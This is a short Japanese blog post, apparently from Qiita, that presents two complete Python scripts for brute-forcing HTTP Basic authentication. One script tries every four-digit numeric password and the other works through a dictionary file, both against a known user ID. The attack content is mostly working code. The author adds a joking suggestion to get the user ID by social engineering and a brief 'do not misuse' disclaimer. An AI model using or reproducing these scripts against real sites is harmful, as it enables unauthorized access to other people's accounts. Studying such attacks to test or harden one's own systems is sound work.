4
7

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 5 years have passed since last update.

PythonでBasic認証へ総当たり攻撃

Last updated at Posted at 2017-12-11

行ったこと

  • 4桁の数字のみを使ったBasic認証への総当たり攻撃
  • 辞書ファイルを使ったBasicn認証への総当たり攻撃

条件

  • パスワード解析のみを行うため,ユーザーIDは知っているという状態
    • わからなかったら,ソーシャルエンジニアリングでもしてください(笑)

環境

  • Python 3

総当たり攻撃(数字4桁)


import urllib.request

def attack_basic(url,user_id):
    for password in range(1,10000):
        password = str(password)
        try:
            pass_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
            pass_mgr.add_password(realm=None,uri=url,user=user_id,passwd=password)
            handler = urllib.request.HTTPBasicAuthHandler(pass_mgr)
            opener = urllib.request.build_opener(handler)
            urllib.request.install_opener(opener)
            urllib.request.urlopen(url)
            print("%s is correct!" % password)
        except urllib.request.HTTPError as err:
            print("%s is incorrect" % password)
    

if __name__ == '__main__':
    url = ""
    user_id = ""
    attack_basic(url,user_id)


総当たり攻撃(辞書ファイル)

import urllib.request

def attack_basic(url,user_id):
    f = open("","r")
    passlist=f.read().splitlines()
    for password in passlist:
        try:
            pass_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
            pass_mgr.add_password(realm=None,uri=url,user=user_id,passwd=password)
            handler = urllib.request.HTTPBasicAuthHandler(pass_mgr)
            opener = urllib.request.build_opener(handler)
            urllib.request.install_opener(opener)
            urllib.request.urlopen(url)
            print("%s is correct!" % password)
        except urllib.request.HTTPError as err:
            print("%s is incorrect" % password)
    

if __name__ == '__main__':
    url = ""
    user_id = ""
    attack_basic(url,user_id)

最後に

  • どちらも悪用厳禁
    • 正直やったところで,ひっかかるWebページは超少ないと思う.
    • これでパスワードがばれるような人は早急に変更しましょう
4
7
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
4
7

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?